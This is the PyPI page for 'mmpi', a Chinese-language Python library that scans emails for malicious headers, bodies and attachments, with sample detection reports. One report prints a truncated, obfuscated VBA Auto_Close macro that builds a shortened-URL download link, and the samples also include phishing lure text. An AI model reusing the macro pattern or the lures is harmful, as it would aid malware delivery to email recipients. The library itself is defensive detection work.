Skip to main content

email detected library

Project description

MMPI

mmpi,一款邮件快速检测python库,基于community框架设计开发。支持对邮件头、邮件正文、邮件附件的检测,并输出检测结果。

一、安装

$ pip install mmpi

备注:windows安装yara-python,可以从这里下载,再使用pip install yara_python-xx-xx-xx-win_amd64.whl进行安装

二、使用

2.1 命令行工具

命令行 说明 使用示例 结果输出
nextb-mmpi-scan 使用nextb-mmpi-scan工具扫描指定的邮件目录或者邮件文件 nextb-mmpi-scan -s $email_dir 输出格式参考扫描结果
nextb-mmpi-run 使用nextb-mmpi-run工具扫描指定的邮件文件,并返回完整报告 nextb-mmpi-run -f $email_file 输出格式参考报告格式

2.2 快速开始

from mmpi import mmpi


def main():
    emp = mmpi()
    emp.parse('test.eml')
    report = emp.get_report()
    print(report)


if __name__ == "__main__":
    main()

三、扫描结果输出

扫描输出格式如下

> nextb-mmpi-scan.exe -s .
nextb-mmpi-scan扫描中: 100%|████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:00<00:00, 23.35eml/s]
+----------+--------------------+
| 邮件名称 | NextB-mmpi命中标签 |
+----------+--------------------+
| .\1.eml  |       未检出       |
| .\10.eml |   spam_detection   |
| .\11.eml |       未检出       |
| .\2.eml  |       未检出       |
| .\3.eml  |       未检出       |
| .\4.eml  |  invalid_zip_file  |
| .\5.eml  | ole_type_not_match |
| .\6.eml  |       未检出       |
| .\7.eml  |   spam_detection   |
| .\8.eml  |       未检出       |
| .\9.eml  |   spam_detection   |
+----------+--------------------+

四、报告格式

包含固定字段:

  • headers:邮件头基本信息
  • body:邮件正文,text和html格式
  • attachments:附件列表
  • signatures:检测标签

动态字段:

  • vba:宏代码
  • rtf:rtf信息
  • zip:压缩包信息
# 示例1
{
    "headers": [
        {
            "From": [
                {
                    "name": "Mohd Mukhriz Ramli (MLNG/GNE)",
                    "addr": "info@vm1599159.3ssd.had.wf"
                }
            ],
            "To": [
                {
                    "name": "",
                    "addr": ""
                }
            ],
            "Subject": "Re: Proforma Invoice",
            "Date": "2020-11-24 12:37:38 UTC+01:00",
            "X-Originating-IP": []
        }
    ],
    "body": [
        {
            "type": "text",
            "content": " \nDEAR SIR, \n\nPLEASE SIGN THE PROFORMA INVOICE SO THAT I CAN PAY AS SOON AS POSSIBLE.\n\nATTACHED IS THE PROFORMA INVOICE,\n\nPLEASE REPLY QUICKLY, \n\nTHANKS & REGARDS' \n\nRAJASHEKAR \n\n Dubai I Kuwait I Saudi Arabia I India I Egypt \nKuwait: +965 22261501 \nSaudi Arabia: +966 920033029 \nUAE: +971 42431343 \nEmail ID: help@rehlat.co [1]m\n \n\nLinks:\n------\n[1]\nhttps://deref-mail.com/mail/client/OV1N7sILlK8/dereferrer/?redirectUrl=https%3A%2F%2Fe.mail.ru%2Fcompose%2F%3Fmailto%3Dmailto%253ahelp%40rehlat.com"
        }
    ],
    "attachments": [
        {
            "type": "doc",
            "filename": "Proforma Invoice.doc",
            "filesize": 1826535,
            "md5": "558c4aa596b0c4259182253a86b35e8c",
            "sha1": "63982d410879c09ca090a64873bc582fcc7d802b"
        }
    ],
    "vba": [],
    "rtf": [
        {
            "is_ole": true,
            "format_id": 2,
            "format_type": "Embedded",
            "class_name": "EQUATion.3",
            "data_size": 912305,
            "md5": "a5cee525de80eb537cfea247271ad714"
        }
    ],
    "signatures": [
        {
            "name": "rtf_suspicious_detected",
            "description": "RTF Suspicious Detected",
            "severity": 3,
            "marks": [
                {
                    "type": "rtf",
                    "tag": "rtf_suspicious_detected"
                }
            ],
            "markcount": 1
        },
        {
            "name": "rtf_exploit_detected",
            "description": "RTF Exploit Detected",
            "severity": 9,
            "marks": [
                {
                    "type": "rtf",
                    "tag": "rtf_exploit_detected"
                }
            ],
            "markcount": 1
        }
    ]
}

# 示例2
{
    "headers": [
        {
            "From": [
                {
                    "name": "Pagon Favre | Purchase",
                    "addr": "pagon@orchutiyekyahai.lol"
                }
            ],
            "To": [
                {
                    "name": "",
                    "addr": "sujata@hilden.in"
                }
            ],
            "Subject": "Purchase Order - 19122020 [Early Dispatch Required]",
            "Date": "2020-12-17 13:48:57 UTC-08:00",
            "X-Originating-IP": []
        }
    ],
    "body": [],
    "attachments": [
        {
            "type": "pps",
            "filename": "Order Details.pps",
            "filesize": 130048,
            "md5": "9e6f2637079a311344f3cf2546de6a88",
            "sha1": "ff4da8a90127f5a6feec7af650fa7014050d25c2"
        },
        {
            "type": "ppt",
            "filename": "Purchase Order 19122020.ppt",
            "filesize": 130048,
            "md5": "9e6f2637079a311344f3cf2546de6a88",
            "sha1": "ff4da8a90127f5a6feec7af650fa7014050d25c2"
        }
    ],
    "vba": [
        {
            "size": 23358,
            "code": "Attribute VB_Name = \"Module1\"\r\nSub Auto_CloSe()\r\n\r\nDim myChrysler As String\r\n\r\nDim myFord As String\r\n\r\nDim SistersRangeRover As String\r\n\r\nmyChrysler = decrypt(\"p\", \"3\") + decrypt(\"|\", \"9\") + decrypt(\"o\", \"7\") + decrypt(\"}\", \"9\") + decrypt(\"c\", \"2\")\r\n\r\nSistersRangeRover = \" http://%999%999@j.mp/asdnabsdjncjnkk\"\r\n\r\n
            ....
            "
        }
    ],
    "signatures": [
        {
            "name": "yara_detected",
            "description": "detected from yara rule",
            "severity": 9,
            "marks": [
                {
                    "type": "vba",
                    "tag": "obfuscate_macros",
                    "description": "obfuscate macros",
                    "severity": 6
                },
                {
                    "type": "vba",
                    "tag": "exec_macros",
                    "description": "exec macros",
                    "severity": 9
                }
            ],
            "markcount": 2
        }
    ]
}
# 示例3
{
    "headers": [
        {
            "From": [
                {
                    "name": "\u7231\u83f2\u7684\u86df\u9f99",
                    "addr": "653518994@qq.com"
                }
            ],
            "To": [],
            "Subject": "\u7231\u83f2\u7684\u86df\u9f99 \u5bc4\u6765\u7684\u8d3a\u5361",
            "Date": "2008-04-26 11:09:07 UTC+08:00",
            "X-Originating-IP": []
        }
    ],
    "body": [
        {
            "type": "text",
            "content": "\u7231\u83f2\u7684\u86df\u9f99 \u5bc4\u6765\u7684\u8d3a\u5361\u300a\u626b\u5893\u53bb\u300b \u56de\u8d60\u8d3a\u5361\u7ed9\u60a8\u7684\u597d\u53cb\r\n\r\n \u5982\u679c\u60a8\u65e0\u6cd5\u67e5\u770b\u8d3a\u5361\uff0c\u70b9\u51fb\u6b64\u5904\u67e5\u770b\u3002\r\n     \u5c71\u6e05\u6c34\u79c0\u98ce\u5149\u597d\uff0c\u6708\u660e\u661f\u7a00\u796d\u626b\u591a\uff0c\u6e05\u660e\u8282\u5230\u4e86\uff0c\u4e00\u8d77\u626b\u5893\u53bb\u5427"
        }
    ],
    "attachments": [],
    "signatures": []
}

五、检测简要说明

5.1 邮件头检测

邮件头解析提取邮件发件人姓名、邮箱、收件人姓名、邮箱、邮件主题、发送时间、发送IP。

通过对发件人邮箱、发送IP做黑名单匹配,实现邮件头检测。

5.2 邮件正文检测

邮件正文解析提取text、html格式内容。

对html文件做分析,实现诸如探针检测、钓鱼检测、垃圾邮件检测等检测逻辑。

5.3 邮件附件检测

邮件附件检测,支持以下文件格式:

  • ole文件格式:如docxls等,提取其中的vba宏代码、模板注入链接
  • zip文件格式:提取压缩文件列表,统计文件名、文件格式等
  • rtf文件格式:解析内嵌ole对象等
  • 其他文件格式:如PE可执行文件

检测逻辑包括:

  • 基本信息规则检测
  • yara规则检测

六、感谢

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

mmpi-0.2.3.tar.gz (75.1 kB view details)

Uploaded Source

File details

Details for the file mmpi-0.2.3.tar.gz.

File metadata

  • Download URL: mmpi-0.2.3.tar.gz
  • Upload date:
  • Size: 75.1 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.7.1 importlib_metadata/4.10.1 pkginfo/1.8.2 requests/2.24.0 requests-toolbelt/0.9.1 tqdm/4.62.3 CPython/3.8.1

File hashes

Hashes for mmpi-0.2.3.tar.gz
Algorithm Hash digest
SHA256 6ade1d31647a5f53f837d251c386489297eebe0a7623ade95b32735d777cbcae
MD5 d492b9cf46ce081ae8a7f846f5c26b3e
BLAKE2b-256 782ad30fa4b2635acb39187972b2b803b02a60ad852e18de784774ffb9dddb45

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page